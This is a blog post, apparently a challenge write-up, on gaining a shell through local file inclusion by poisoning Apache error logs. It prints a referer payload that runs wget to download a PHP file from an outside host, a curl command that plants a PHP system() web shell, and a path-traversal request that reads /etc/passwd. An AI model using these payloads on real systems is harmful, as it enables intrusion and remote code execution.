Spawning a Shell by LFI Poisoning Log Files

Spawning a Shell by LFI Poisoning Log Files

Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge, I found one of the pages vulnerable to SQL Injection, I injected it, extracted the Admin’s Credentials and as soon as I logged in the “Admin Panel”, I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that but they weren’t working/there. 🙁 ..

The only thing I didn’t try was LFI Log File Poisoning but It was time to unchain the beast ..
I included the “Apache HTTP Configuration file” and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script ..

Spawning a Shell by LFI Poisoning Log Files

Me likey 🙂 .. Then, of course, I included the bash script. — This was it’s contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

while : ; do
 read line
 [ -z "$line" ] && exit

 DOMAIN=""
 if [[ "$line" =~ \[host:([^\]]+) ]]; then
 DOMAIN=${BASH_REMATCH[1]}
 fi
 
 if [ -n "$DOMAIN" ]; then
 echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
 chown apache:apache /var/www/html/$DOMAIN/logs/error_${DATE}.log
 else
 echo "${line}" >> /var/www/html/error_${DATE}.log
 chown apache:apache /var/www/html/error_${DATE}.log
 fi
done

What does this do? It creates a .log file in “/var/www/html/domain.tld/logs/” with the name “error_YYYY-MM-DD” & According to the Apache Config, It sent URL, Referer and time to this bash script which then saved it to the file .. So, I just had to visit a non-existent page *to get a 404* with my referer set to “<?php system(‘wget http://x.com/y.txt -O z.php’); ?>” or any of it’s equivalents .. and then include the .log file to execute the code 😉

curl -e “<?php system($_POST[‘x’]) ?>” http://domain.tld/blablabla.ext

Spawning a Shell by LFI Poisoning Log Files

curl –data “x=cat /etc/passwd” http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log

Spawning a Shell by LFI Poisoning Log Files

I guess we’re done here 😀

ps: after solving the challenge I found out the “official solution” was nothing like this, it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to sucessfully bypass that function + other image re-sizing functions .. there are various great articles written on that topic here are some of them ..

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

4 thoughts on “Spawning a Shell by LFI Poisoning Log Files”

  1. If this all works as you explained, you are a genius! I wish I had more of a programming brain. How did you learn?

Leave a Reply